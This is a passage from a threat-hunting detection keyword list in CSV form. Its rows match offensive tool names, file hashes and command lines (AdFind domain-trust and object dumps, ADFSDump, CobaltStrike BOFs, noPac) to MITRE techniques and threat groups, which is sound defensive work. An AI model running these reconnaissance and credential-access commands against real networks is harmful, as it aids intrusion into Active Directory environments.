T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - 
EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","0","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","33383" "*AddUserToDomainGroup.*",".{0,1000}AddUserToDomainGroup\..{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society 
- Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","33384" "*AddUserToDomainGroup.cna*",".{0,1000}AddUserToDomainGroup\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","33385" "*adeb6e60c4b8f102216d935dfa9dfe6cf53988fe41f9418fdb5674b5adadbf65*",".{0,1000}adeb6e60c4b8f102216d935dfa9dfe6cf53988fe41f9418fdb5674b5adadbf65.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","33389" "*adeb6e60c4b8f102216d935dfa9dfe6cf53988fe41f9418fdb5674b5adadbf65*",".{0,1000}adeb6e60c4b8f102216d935dfa9dfe6cf53988fe41f9418fdb5674b5adadbf65.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","33390" "*adeb6e60c4b8f102216d935dfa9dfe6cf53988fe41f9418fdb5674b5adadbf65*",".{0,1000}adeb6e60c4b8f102216d935dfa9dfe6cf53988fe41f9418fdb5674b5adadbf65.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","33391" "*adeeb0a359ee487e9a32bed145a31b5f230153bce48040bc00b2478853e0377a*",".{0,1000}adeeb0a359ee487e9a32bed145a31b5f230153bce48040bc00b2478853e0377a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33392" "*ADeleg.exe -*",".{0,1000}ADeleg\.exe\s\-.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. 
It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","0","N/A","N/A","8","3","294","31","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z","33393" "*ADeleg_InsecureResourceDelegationReport_*",".{0,1000}ADeleg_InsecureResourceDelegationReport_.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","33394" "*ADeleg_InsecureTrusteeDelegationReport_*",".{0,1000}ADeleg_InsecureTrusteeDelegationReport_.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","33395" "*adexplorer.go*",".{0,1000}adexplorer\.go.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","1","N/A","AD Enumeration","10","10","1908","184","2025-03-25T13:01:45Z","2020-10-07T10:07:22Z","33397" "*ADExplorerSnapshot.py*",".{0,1000}ADExplorerSnapshot\.py.{0,1000}","offensive_tool_keyword","ADExplorerSnapshot.py","ADExplorerSnapshot.py is an AD Explorer snapshot parser. 
It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.","T1087.002 - T1482 - T1083 - T1003.008","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/c3c/ADExplorerSnapshot.py","1","1","N/A","N/A","10","10","956","126","2025-03-14T16:13:41Z","2021-12-22T14:42:23Z","33401" "*ADExplorerSnapshot.py.git*",".{0,1000}ADExplorerSnapshot\.py\.git.{0,1000}","offensive_tool_keyword","ADExplorerSnapshot.py","ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound and also supports full-object dumping to NDJSON.","T1087.002 - T1482 - T1083 - T1003.008","TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/c3c/ADExplorerSnapshot.py","1","1","N/A","N/A","10","10","956","126","2025-03-14T16:13:41Z","2021-12-22T14:42:23Z","33402" "*adf6d464ce449914110607706da329993186f52f99074af1b7b1734a46dd4fcf*",".{0,1000}adf6d464ce449914110607706da329993186f52f99074af1b7b1734a46dd4fcf.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","0","#filehash #linux","N/A","10","6","552","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z","33403" "*adfind -gcb -sc trustdmp*",".{0,1000}adfind\s\-gcb\s\-sc\strustdmp.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","N/A","10","4","312","44","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z","33408" "*adfind -sc adinfo*",".{0,1000}adfind\s\-sc\sadinfo.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","N/A","10","4","312","44","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z","33409" "*adfind -sc computers_pwdnotreqd*",".{0,1000}adfind\s\-sc\scomputers_pwdnotreqd.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. 
attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","N/A","10","4","312","44","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z","33410" "*adfind -sc dclist*",".{0,1000}adfind\s\-sc\sdclist.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","N/A","10","4","312","44","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z","33411" "*adfind -sc dcmodes*",".{0,1000}adfind\s\-sc\sdcmodes.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","N/A","10","4","312","44","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z","33412" "*adfind -sc domainlist*",".{0,1000}adfind\s\-sc\sdomainlist.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. 
attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","N/A","10","4","312","44","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z","33413" "*adfind -sc trustdmp*",".{0,1000}adfind\s\-sc\strustdmp.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","N/A","10","4","312","44","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z","33414" "*adfind -subnets*",".{0,1000}adfind\s\-subnets.{0,1000}","offensive_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in Lateral Movement. privilege escalation. or even data exfiltration. 
Such reconnaissance activities often precede more damaging attacks.","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Other/AdFind","1","0","N/A","N/A","10","4","312","44","2023-01-10T11:57:23Z","2021-11-12T18:22:13Z","33416" "*adfind.exe -f (objectcategory=organizationalUnit) > *.txt*",".{0,1000}adfind\.exe\s\-f\s\(objectcategory\=organizationalUnit\)\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33418" "*adfind.exe -f (objectcategory=person) > *.txt*",".{0,1000}adfind\.exe\s\-f\s\(objectcategory\=person\)\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - 
NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33419" "*adfind.exe -f *(objectcategory=group)* > *.txt*",".{0,1000}adfind\.exe\s\-f\s.{0,1000}\(objectcategory\=group\).{0,1000}\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33420" "*adfind.exe -f objectcategory=computer > *.txt*",".{0,1000}adfind\.exe\s\-f\sobjectcategory\=computer\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33421" "*adfind.exe -gcb -sc trustdmp 
> *.txt*",".{0,1000}adfind\.exe\s\-gcb\s\-sc\strustdmp\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33423" "*AdFind.exe -sc getacls -sddlfilter *computer* -recmute*",".{0,1000}AdFind\.exe\s\-sc\sgetacls\s\-sddlfilter\s\s\s.{0,1000}computer.{0,1000}\s\s\-recmute.{0,1000}","offensive_tool_keyword","noPac","command used in the method prerequisites of the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","33424" "*adfind.exe -subnets -f (objectCategory=subnet) > *.txt*",".{0,1000}adfind\.exe\s\-subnets\s\-f\s\(objectCategory\=subnet\)\s\>\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","adfind","attackers perform Active Directory collection using AdFind in batch scripts from C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1087 - T1016 - T1482","TA0007 - TA0008 - TA0043","N/A","APT29 - Akira - Black Basta - BlackSuit - Conti - COZY BEAR - Dagon Locker - Diavol - FIN6 - FIN7 - INC Ransom - LockBit - MAZE - MUSTANG PANDA - NetWalker - Nokoyawa - PLAY - Quantum - REvil - Royal - Ryuk - TA505 - TRAVELING SPIDER - Unit 29155 - WIZARD 
SPIDER - Wizard Spider - XingLocker - menuPass - Dispossessor","Discovery","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33426" "*ADFSDump.csproj*",".{0,1000}ADFSDump\.csproj.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","33430" "*ADFSDump.exe*",".{0,1000}ADFSDump\.exe.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","33431" "*ADFSDump.exe*",".{0,1000}ADFSDump\.exe.{0,1000}","offensive_tool_keyword","ADFSDump","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","ADFSDump","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33432" "*ADFSDump.exe*",".{0,1000}ADFSDump\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","33433" 
"*ADFSDump.exe*",".{0,1000}ADFSDump\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","ADFSDump","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","33434" "*ADFSDump.exe*",".{0,1000}ADFSDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33435" "*ADFSDump.sln*",".{0,1000}ADFSDump\.sln.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","N/A","10","4","349","67","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z","33436" "*ADFSpoof.py*",".{0,1000}ADFSpoof\.py.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential 
